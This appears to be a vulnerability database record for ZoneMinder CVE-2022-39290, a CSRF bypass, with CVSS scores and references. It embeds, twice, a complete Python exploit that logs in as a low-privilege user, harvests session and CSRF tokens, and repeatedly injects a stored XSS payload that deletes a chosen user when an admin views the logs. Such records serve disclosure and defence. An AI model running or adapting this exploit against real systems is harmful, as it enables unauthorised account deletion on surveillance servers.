VAR-202210-0233
Vulnerability from variot - Updated: 2025-01-30 21:11

ZoneMinder is a free, open source closed-circuit television software application. In affected versions, authenticated users can bypass CSRF keys by modifying the request supplied to the ZoneMinder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

ZoneMinder contains an authentication vulnerability. Information may be tampered with.

```python
# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
# Date: 10/01/2022
# Exploit Author: Trenches of IT
# Vendor Homepage: https://github.com/ZoneMinder/zoneminder
# Version: v1.36.26
# Tested on: Linux/Windows
# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
#
# Proof of Concept:
# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
# 2 - Admin user navigates to http://<target>/zm/index.php?view=log
# 3 - XSS executes delete function on target UID (user).

import requests
import re
import time
import argparse
import sys

def getOptions(args=sys.argv[1:]):
    parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -zU lowpriv -zP lowpriv -d 1")
    parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4)", required=True)
    parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80)", required=True)
    parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv)", required=True)
    parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv)", required=True)
    parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7)", required=True)
    options = parser.parse_args(args)
    return options

options = getOptions(sys.argv[1:])

payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>"

# Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password
loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"}
loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"}
response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)
zmHeaders = response.headers
try:
    zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))
    finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')
except IndexError:
    # No ZMSESSID cookie was returned in the response headers
    print("[ERROR] Ensure the provided username and password is correct.")
    sys.exit(1)
print("Collected the low privilege user session token: "+finalSession)

# Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter"
csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'}
csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"}
response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)
zmBody = response.text
extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))
finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')
print("Collected the CSRF key for the log injection request: "+finalCsrfKey)
print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")

while True:

    # XSS Request
    xssUrl = "http://"+options.ip+"/zm/index.php"
    xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
    xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
    xssData = {"__csrf_magic": finalCsrfKey, "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
    response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
    print("Injecting payload: " + response.text)

    time.sleep(1)
```
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0233",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39290",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-39290",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2022-39290",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39290",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39290",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39290",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-39290",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-331",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. ZoneMinder There is an authentication vulnerability in.Information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. 
(Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": 
\"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", 
\"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = 
requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39290"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39290",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"id": "VAR-202210-0233",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:11:14.974000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=210329"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/c0a4c05e84eea0f6ccf7169c014efe5422c9ba0d"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-xgv6-qv6c-399q"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39290/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"date": "2022-10-07T21:15:11.673000",
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"date": "2023-03-27T18:15:11.687000",
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
],
"trust": 0.6
}
}